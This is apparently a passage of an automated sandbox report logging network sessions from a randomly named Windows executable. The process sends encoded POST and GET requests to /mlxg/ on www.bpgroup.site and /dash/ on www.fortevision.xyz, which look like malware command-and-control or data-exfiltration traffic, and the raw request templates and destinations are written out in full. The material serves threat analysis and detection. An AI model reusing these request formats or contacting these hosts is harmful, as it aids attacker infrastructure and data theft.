                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.44983574.48.143.82804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:38.993603945 CET722OUTPOST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 41 6c 65 51 42 61 36 62 34 35 78 6d 50 64 68 71 58 74 6b 74 74 76 38 6a 31 77 66 51 69 75 56 32 51 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXoAleQBa6b45xmPdhqXtkttv8j1wfQiuV2Q==
                                                                                      Nov 24, 2024 08:10:40.198443890 CET1236INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:40 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:40.198467016 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.44984274.48.143.82804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:41.666551113 CET742OUTPOST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 57 49 39 5a 77 61 50 78 74 50 6b 73 45 67 59 54 46 4f 64 41 37 6c 6c 78 32 2b 42 55 6f 44 55 30 74 77 78 57 5a 4c 47 73 44 4a 63 73 39 2b 52 6a 62 46 49 43 7a 73 76 52 53 6b 74 6d 5a 47 35 38 69 44 77 48 32 49 5a 6b 61 49 30 54 79 54 50 57 6c 50 74 43 58 31 61 30 74 68 32 70 62 55 42 64 7a 38 41 43 66 70 78 34 6a 2f 2b 72 50 31 4c 58 50 50 6f 64 53 6c 67 41 6f 6f 66 52 57 57 65 35 45 51 75 70 51 37 37 6d 4d 7a 2f 74 4c 50 2b 79 35 72 64 68 54 63 74 65 65 48 38 5a 7a 74 4a 4d 56 57 67 48 4a 4a 46 53 59 36 58 73 59 3d
                                                                                      Data Ascii: 3vNdCBvX=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tLP+y5rdhTcteeH8ZztJMVWgHJJFSY6XsY=
                                                                                      Nov 24, 2024 08:10:42.916935921 CET1236INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:43 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:42.917006016 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.44984874.48.143.82804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:44.335087061 CET10824OUTPOST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 67 51 73 39 64 76 69 30 51 32 75 76 66 51 6f 41 39 68 56 58 53 66 67 73 37 34 32 6f 72 66 63 4e 31 68 75 67 30 54 65 44 77 44 43 4d 66 62 74 6b 6b 61 35 58 53 51 33 76 54 4d 73 72 34 32 58 39 76 59 68 78 57 55 62 53 79 67 78 35 4d 72 72 33 4b 75 52 48 79 63 77 79 79 69 31 69 56 70 41 51 33 68 78 72 4f 66 76 4f 77 30 70 56 41 39 70 67 43 2f 38 47 4b 30 51 6d 4d 36 6b 37 77 5a 5a 7a 75 35 45 32 5a 53 72 71 43 31 6d 30 32 73 6c 7a 67 44 78 36 34 68 4a 67 6d 77 75 56 61 74 70 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZOI8r4adiFPqMEgDzFNdA7ClxuyBUk1U2VwwwtLBdDJWs9+dDbIGiy0vRCgtmJG58iDwByIe1aI5zySOWl5pCXda0Fx2pevBrD8AiPpqrL/9LP3KXPXoaa+gAkefSK4e5gQs9dvi0Q2uvfQoA9hVXSfgs742orfcN1hug0TeDwDCMfbtkka5XSQ3vTMsr42X9vYhxWUbSygx5Mrr3KuRHycwyyi1iVpAQ3hxrOfvOw0pVA9pgC/8GK0QmM6k7wZZzu5E2ZSrqC1m02slzgDx64hJgmwuVatpydFkViqHMmCh/ZMW+PxfaX2hTrRMD7tHcJrfcgfxMz8hVCSRBSllMiOVDUvdeBQT33NCKgH/bLKWl4FqxYg7TXEZ8+K25u84R7RHTfHEXpLXa9c+jEIEUgqwULFJUC5yTcz/wuilmc63+w99EDO8IaQjHQftjGo/H2IWzxG2eOZ6I88NAsrfRVwdg4OwMk4s4pQV3Fq9a/hm2idrH+8Yiboh0BmI5ukHoSX4vzFDwV6A95occvFxLVSOgdk+mcZf0aJt8CDisHvEcxn8abTD+1BH5EXxMCaaS57uTpK7lzE7ZBloJhQRLIi8Z2V7IS4AYUuYQRFHciNtlymf3fgPrNIeN0UQvWfS21tStfuORtGAbEiLmTeYun21JH8fiW16kWCz4GuTT4gWyftNbyygyhIWdlWeNV34dFRxw6LFd+lKfy/wcOhSlnijH2h0Z0Qt7+SPPlgFnNKsk7bb/7JUoZcuIRSbRqF5Q2DpZQ6t15N/rNZwHgXVIT0iM7taD/bhpUvUGlKB1uR6GAiGUDtR46gIafKhOIQxx95D4B4AwCIVHgX7SOfg1c+B552QURg00dAHIINBvai2aexpMmYaxlnrOWAYeRCNR6Hloi4L+SN7DZHCGYXEhqrUfqosmjiHab3s0TIV8lns50hf/gwcLdZXm1JeqwX7uJ [TRUNCATED]
                                                                                      Nov 24, 2024 08:10:45.583853006 CET1236INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:45 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:45.583875895 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.44985474.48.143.82804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:46.991288900 CET460OUTGET /mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:48.200839996 CET1236INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:48 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:48.200902939 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.44987013.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:53.836222887 CET731OUTPOST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 56 4f 76 68 74 72 41 48 41 55 51 64 69 73 4f 58 5a 4e 4c 6a 63 4b 4b 64 30 73 66 4f 32 4a 42 53 61 48 45 52 32 54 33 63 53 4b 6a 76 52 76 56 67 4a 6c 74 75 45 44 6f 42 51 68 78 31 6f 65 41 68 31 2f 48 4e 33 72 39 50 79 47 59 50 70 6a 59 4f 33 67 4e 50 6a 75 39 6a 55 4a 53 44 44 39 49 32 76 2f 6a 30 2b 35 63 75 78 46 55 2f 75 39 33 69 78 34 71 61 65 65 65 53 58 50 75 50 73 38 68 32 7a 66 66 78 5a 72 57 76 74 63 59 4f 54 33 59 4c 31 65 53 47 79 64 73 7a 65 66 42 36 57 4b 74 37 74 41 30 49 4a 70 71 52 55 39 32 57 77 34 42 55 78 6a 65 37 64 6b 37 6d 4e 50 2b 4e 47 69 31 6b 44 67 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tA0IJpqRU92Ww4BUxje7dk7mNP+NGi1kDg==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.44988013.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:56.509388924 CET751OUTPOST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 66 7a 76 52 4b 70 67 49 67 42 75 46 44 6f 42 59 42 78 77 33 75 42 76 31 34 50 7a 33 70 35 50 79 47 38 50 70 6d 38 4f 77 54 6c 4f 67 65 39 68 4e 5a 53 57 65 4e 49 32 76 2f 6a 30 2b 39 38 45 78 46 63 2f 75 4a 7a 69 33 74 65 5a 64 65 65 4e 55 50 75 50 6e 63 68 79 7a 66 65 6b 5a 70 75 56 74 65 77 4f 54 32 6f 4c 31 76 53 46 39 64 73 70 41 76 41 78 58 37 41 74 6f 44 6c 75 55 49 4b 6d 5a 4d 2b 63 34 65 4d 4f 67 53 2f 73 50 6b 66 56 51 49 33 35 4c 68 49 74 59 6d 63 37 71 4a 4c 66 2f 31 50 39 5a 61 41 43 45 47 33 76 61 37 63 3d
                                                                                      Data Ascii: 3vNdCBvX=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkfVQI35LhItYmc7qJLf/1P9ZaACEG3va7c=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
